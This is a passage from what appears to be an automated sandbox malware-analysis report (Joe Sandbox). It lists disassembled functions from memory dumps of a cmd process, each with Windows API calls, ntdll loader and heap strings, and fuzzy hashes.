                                                                                        • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                                                                        • String ID:
                                                                                        • API String ID: 242869866-0
                                                                                        • Opcode ID: c0f130b46ed5d6ec9e5b6f5cc9158ebac6548053761e54ee80faa9dd90c6da7b
                                                                                        • Instruction ID: e621e1b28f3909af62c244d471909d36ab7f9e88392a5c352982e6150473b1ee
                                                                                        • Opcode Fuzzy Hash: c0f130b46ed5d6ec9e5b6f5cc9158ebac6548053761e54ee80faa9dd90c6da7b
                                                                                        • Instruction Fuzzy Hash: 05518F76608311CBC724DF28D84856BBBE5EFC8710F198A1EF889C7290E771D905CBA6
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03ADF113 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                        • API String ID: 0-523794902
                                                                                        • Opcode ID: 16df0cd4e710329ab8978bc76bbbd017ac49730f4d87866af38b10aa060f080d
                                                                                        • Instruction ID: 697bb6eb3640fef895635c07d644bf24ce212ad3defda0162aa15584914546a6
                                                                                        • Opcode Fuzzy Hash: 16df0cd4e710329ab8978bc76bbbd017ac49730f4d87866af38b10aa060f080d
                                                                                        • Instruction Fuzzy Hash: A442DA352093819FC715DF28C984A6BBBE5FF89608F0849AEF8978B352D730D945CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AFB0D0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                                                        • API String ID: 0-122214566
                                                                                        • Opcode ID: 69f9a9e11bff75cd4051b3cb1a9f9a2ddf0cd28d12522397da5dbf7eecbece9e
                                                                                        • Instruction ID: 720e61a8ce467cf7be6bbaf21f0fc6a4a3f90cab03eb5c2f8720d72e63ad276d
                                                                                        • Opcode Fuzzy Hash: 69f9a9e11bff75cd4051b3cb1a9f9a2ddf0cd28d12522397da5dbf7eecbece9e
                                                                                        • Instruction Fuzzy Hash: 49C12675E00715AFDB18DBA8C890BBEB7B5AF45704F1841ABFA02EB291D770D944C3A0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D70740 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • wcstol.MSVCRT ref: 00D708D9
                                                                                        • wcstol.MSVCRT ref: 00D708F3
                                                                                        • wcstol.MSVCRT ref: 00D7090B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: wcstol$Heap$AllocProcess
                                                                                        • String ID:
                                                                                        • API String ID: 2343214347-0
                                                                                        • Opcode ID: a66ab0bfeda3d97d8a15441a18f1d550038825162f64abd308f27f338ae40ac3
                                                                                        • Instruction ID: 8d0204f7b19a67355affe33e5cc0f99ca7272c2e59e8ab628f53f565299f341a
                                                                                        • Opcode Fuzzy Hash: a66ab0bfeda3d97d8a15441a18f1d550038825162f64abd308f27f338ae40ac3
                                                                                        • Instruction Fuzzy Hash: F9A1A171A00214CBDB24EFA9D85597EBBB6EF48304B18802DE949DB395EB70DC01CBB1
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D66B20 Relevance: 7.8, APIs: 5, Instructions: 272COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00D6DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000), ref: 00D6DCE1
                                                                                          • Part of subcall function 00D6DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00D6ACD8,00000001,?,00000000,00D68C23,-00000105,00D8C9B0,00000240,00D71E92,00000000,00000000,00D7ACE0,00000000,00000000), ref: 00D6DCE8
                                                                                        • _pipe.MSVCRT ref: 00D66B4F
                                                                                        • _get_osfhandle.MSVCRT ref: 00D66BF7
                                                                                        • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 00D66C05
                                                                                          • Part of subcall function 00D6E950: memset.MSVCRT ref: 00D6E9A0
                                                                                          • Part of subcall function 00D6E950: wcschr.MSVCRT ref: 00D6E9FC
                                                                                          • Part of subcall function 00D6E950: wcschr.MSVCRT ref: 00D6EA14
                                                                                          • Part of subcall function 00D6E950: _wcsicmp.MSVCRT ref: 00D6EA80
                                                                                        • ??_V@YAXPAX@Z.MSVCRT ref: 00D66D8F
                                                                                        • longjmp.MSVCRT(00DA0A30,00000001), ref: 00D7A6D8
                                                                                          • Part of subcall function 00D6A1A8: _dup.MSVCRT ref: 00D6A1AF
                                                                                          • Part of subcall function 00D6A1D6: _dup2.MSVCRT ref: 00D6A1EA
                                                                                          • Part of subcall function 00D6A16C: _close.MSVCRT ref: 00D6A19B
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: Heapwcschr$AllocDuplicateHandleProcess_close_dup_dup2_get_osfhandle_pipe_wcsicmplongjmpmemset
                                                                                        • String ID:
                                                                                        • API String ID: 1441200171-0
                                                                                        • Opcode ID: 4f22a38a6acc8037dda21ddcc06b9f911c6e03da82a300d60864f9cc86c45f7b
                                                                                        • Instruction ID: 0955373f9cd80fe34419b99110c75d0281f35b44572b1eb9df11eef1c5cc63ef
                                                                                        • Opcode Fuzzy Hash: 4f22a38a6acc8037dda21ddcc06b9f911c6e03da82a300d60864f9cc86c45f7b
                                                                                        • Instruction Fuzzy Hash: B69176756007049FDB24EF29D896A2E77A1EB89320F19852EE45AD7391EB30EC41CF71
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B1631F Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-792281065
                                                                                        • Opcode ID: b8c68cdb0e0410cbff2376bb6e8caa2102d60cf80a5685faa90751b3d978617f
                                                                                        • Instruction ID: 92903fa77a4b24ec8f90ea06f70e1167b0fc5495b1ea8ff3be77aa10b7046e46
                                                                                        • Opcode Fuzzy Hash: b8c68cdb0e0410cbff2376bb6e8caa2102d60cf80a5685faa90751b3d978617f
                                                                                        • Instruction Fuzzy Hash: A5916735A023549FDB24EF18D915BAD7BA4EB0171CF5800FAFD05AF285E7B09851CB91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B8F0A5 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                        • API String ID: 0-1745908468
                                                                                        • Opcode ID: c581d33b51545b4713f7fae2ece74211af0c061589053d783112746f75c26e73
                                                                                        • Instruction ID: b19f7c1cb0204f260fc88eabd9a7c10054239bfaaf4b57df05f71f4140b5ddb6
                                                                                        • Opcode Fuzzy Hash: c581d33b51545b4713f7fae2ece74211af0c061589053d783112746f75c26e73
                                                                                        • Instruction Fuzzy Hash: E891E039A01745DFCB15FFA8E440AADFBF1FF49718F1880AAE446AB652C7759A40CB10
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B0510F Relevance: 6.7, Strings: 5, Instructions: 434COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • Kernel-MUI-Language-SKU, xrefs: 03B0534B
                                                                                        • Kernel-MUI-Language-Allowed, xrefs: 03B0519B
                                                                                        • WindowsExcludedProcs, xrefs: 03B0514A
                                                                                        • Kernel-MUI-Number-Allowed, xrefs: 03B05167
                                                                                        • Kernel-MUI-Language-Disallowed, xrefs: 03B05272
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                                                        • API String ID: 0-258546922
                                                                                        • Opcode ID: 4587be1e412f88a9417d5d45dcfdcd23bb6d775696d7518d6f87b0c991324ac0
                                                                                        • Instruction ID: e9a9a12c42b89cb4cc44fa24286b8b36c5b860ea1b1e807f25041a4971bd111e
                                                                                        • Opcode Fuzzy Hash: 4587be1e412f88a9417d5d45dcfdcd23bb6d775696d7518d6f87b0c991324ac0
                                                                                        • Instruction Fuzzy Hash: B0F13D76D04218EFCB21DF99C980AEEBBBCFF49654F1441ABE505EB650E7709E018B90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D76B40 Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00D76C76,00D61000), ref: 00D76B47
                                                                                        • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00D76C76,?,00D76C76,00D61000), ref: 00D76B50
                                                                                        • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,00D76C76,00D61000), ref: 00D76B5B
                                                                                        • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,00D76C76,00D61000), ref: 00D76B62
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                                                                        • String ID:
                                                                                        • API String ID: 3231755760-0
                                                                                        • Opcode ID: 3781054b100c785f6384a311a87964b180fe66522cd4fed253c5498072a7baff
                                                                                        • Instruction ID: ef3858abeb8df7a07861dfebbd9d50562c3daa0ec07384c0394ea04935f16f4a
                                                                                        • Opcode Fuzzy Hash: 3781054b100c785f6384a311a87964b180fe66522cd4fed253c5498072a7baff
                                                                                        • Instruction Fuzzy Hash: 4DD0C972040304ABCA012BE9EC0CB493F28EB8A252F014100F30DC6261CB364811CB7F
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AEA2E0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                        • API String ID: 0-379654539
                                                                                        • Opcode ID: 37302742e7e9e69076fb7b440188be188c71f56059b9ab47d36ea3880afd4af0
                                                                                        • Instruction ID: 6ded06db4e3dc2b0d95b381763d8ec19cb6fd3479a3570c0233a1b7911817515
                                                                                        • Opcode Fuzzy Hash: 37302742e7e9e69076fb7b440188be188c71f56059b9ab47d36ea3880afd4af0
                                                                                        • Instruction Fuzzy Hash: B4C16B752083828FC721CF58C584B6AB7F4FF85704F0489AAF8968B250E734D94ADB66
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B18322 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • LdrpInitializeProcess, xrefs: 03B18342
                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 03B1847E
                                                                                        • @, xrefs: 03B184B1
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 03B18341
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-1918872054
                                                                                        • Opcode ID: 984662e93af4c0bc60f4f2b11274d85a57c2414e577720a94a64e4dca8e43731
                                                                                        • Instruction ID: eaf24f6fc8272fd765ba45f42e0fe1bc83ee3e7658c26e7a733fdc2f011ae004
                                                                                        • Opcode Fuzzy Hash: 984662e93af4c0bc60f4f2b11274d85a57c2414e577720a94a64e4dca8e43731
                                                                                        • Instruction Fuzzy Hash: FC918A71108340AED721DB65C941FABBBECFB84748F4409BEFA89CA141E734D954CB62
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE63CB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 03B40E2F
                                                                                        • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 03B40E72
                                                                                        • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 03B40DEC
                                                                                        • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 03B40EB5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                                                        • API String ID: 0-1468400865
                                                                                        • Opcode ID: 717000bee3b34f70a7cdd5fe701a98873901393b20cefabd0bf6cd637b1ef5e7
                                                                                        • Instruction ID: f4493f5910473e4a1125bd6fb18944fbfdcd7c56e00333bdf4554ec781a0c75b
                                                                                        • Opcode Fuzzy Hash: 717000bee3b34f70a7cdd5fe701a98873901393b20cefabd0bf6cd637b1ef5e7
                                                                                        • Instruction Fuzzy Hash: FB71E276904304AFCB60EF14C984B9B7FACEFA5758F0409B9F9498B156D334D588CB92
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B0237A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 03B4A79F
                                                                                        • apphelp.dll, xrefs: 03B02382
                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 03B4A7AF
                                                                                        • LdrpDynamicShimModule, xrefs: 03B4A7A5
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                                                        • API String ID: 0-176724104
                                                                                        • Opcode ID: 07a4c38c7de3ac4b6c05215ba030266e8aa39fb6562bb28ca3da31d3ec818366
                                                                                        • Instruction ID: 45fa0d89269fe65623e6afac2f0675d4795e72fdbc104b4bc004ade8648bc253
                                                                                        • Opcode Fuzzy Hash: 07a4c38c7de3ac4b6c05215ba030266e8aa39fb6562bb28ca3da31d3ec818366
                                                                                        • Instruction Fuzzy Hash: 0E314A39A41200AFDB20EF18DA95F6DB7B4FB84B0CF1800FAE9056B655E7705951DB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AD90F8 Relevance: 5.1, Strings: 4, Instructions: 100COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP[%wZ]: $VirtualProtect Failed 0x%p %x$VirtualQuery Failed 0x%p %x
                                                                                        • API String ID: 0-1391187441
                                                                                        • Opcode ID: d519814763d7daee53dd54e8c8abdedfb05905165a955f9fb911c72c7df100e9
                                                                                        • Instruction ID: 970541c572878d9f918dd981a3040312d8938961f076cb38ee656274ede9b55f
                                                                                        • Opcode Fuzzy Hash: d519814763d7daee53dd54e8c8abdedfb05905165a955f9fb911c72c7df100e9
                                                                                        • Instruction Fuzzy Hash: EF31C436A00254FFCB51DB58CC89F9EB7B8FF46764F1540AAF816AB291D770E940CA60
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00D7643A Relevance: 4.6, APIs: 3, Instructions: 69nativethreadCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • NtOpenThreadToken.NTDLL ref: 00D76454
                                                                                        • NtOpenProcessToken.NTDLL(000000FF,00000008,00000000), ref: 00D7646C
                                                                                        • NtClose.NTDLL ref: 00D764BD
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068460752803.0000000000D60000.00000040.80000000.00040000.00000000.sdmp, Offset: 00D60000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000D8E000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068460752803.0000000000DAA000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068461251943.0000000000DAE000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_d60000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID: OpenToken$CloseProcessThread
                                                                                        • String ID:
                                                                                        • API String ID: 2991381754-0
                                                                                        • Opcode ID: 33b0137e4b20670bd8194d0cfb6211c48b2c5022b21c069bc9629a2e32c3caf6
                                                                                        • Instruction ID: 870c01ba0d84c7cd0447f23500c4895e0e038a645c649d164e5550100683ee34
                                                                                        • Opcode Fuzzy Hash: 33b0137e4b20670bd8194d0cfb6211c48b2c5022b21c069bc9629a2e32c3caf6
                                                                                        • Instruction Fuzzy Hash: 4611DA32D04716EFDB109B64D848B9DB778EB44329F248665E519A7280F774DE08C7B0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B89060 Relevance: 4.3, Strings: 3, Instructions: 558COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: $ $0
                                                                                        • API String ID: 0-3352262554
                                                                                        • Opcode ID: d919797c7dac21642a0b4becb6b54ed88f6ee0b9382ce2dd571ff44ad7dbe36e
                                                                                        • Instruction ID: 3e4bda8b4f543f0e603a65e3cfa33ffde62880c8758801824e9b63cc08ea04a5
                                                                                        • Opcode Fuzzy Hash: d919797c7dac21642a0b4becb6b54ed88f6ee0b9382ce2dd571ff44ad7dbe36e
                                                                                        • Instruction Fuzzy Hash: 413212B16083819FDB50DF68C884BABFBE5BF88348F04496EF59987250D774E948CB52
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03AE1380 Relevance: 4.1, Strings: 3, Instructions: 385COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        • HEAP[%wZ]: , xrefs: 03AE1632
                                                                                        • HEAP: , xrefs: 03AE14B6
                                                                                        • HEAP: Free Heap block %p modified at %p after it was freed, xrefs: 03AE1648
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_15_2_3ab0000_cmd.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                                        • API String ID: 0-3178619729
                                                                                        • Opcode ID: 2b77e5e92c9cc3b3c3b1196d302f86aba1cd74c1ded52ac8ff83d793a74254d6
                                                                                        • Instruction ID: b30a41da0cefd00a9e3e75a57de42c9f1730ec7af71a6672bf1443c5063be1c8
                                                                                        • Opcode Fuzzy Hash: 2b77e5e92c9cc3b3c3b1196d302f86aba1cd74c1ded52ac8ff83d793a74254d6
                                                                                        • Instruction Fuzzy Hash: 2CE1F271A042659FDB28CF28C451BBABBF5EF49304F1888AEE496CB345E734E941CB50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 03B6330C Relevance: 4.0, Strings: 3, Instructions: 292COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000F.00000002.2068464988355.0000000003AB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: true
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BD9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 0000000F.00000002.2068464988355.0000000003BDD000.00000040.00001000.00020000.00000000.sdmpDownload File
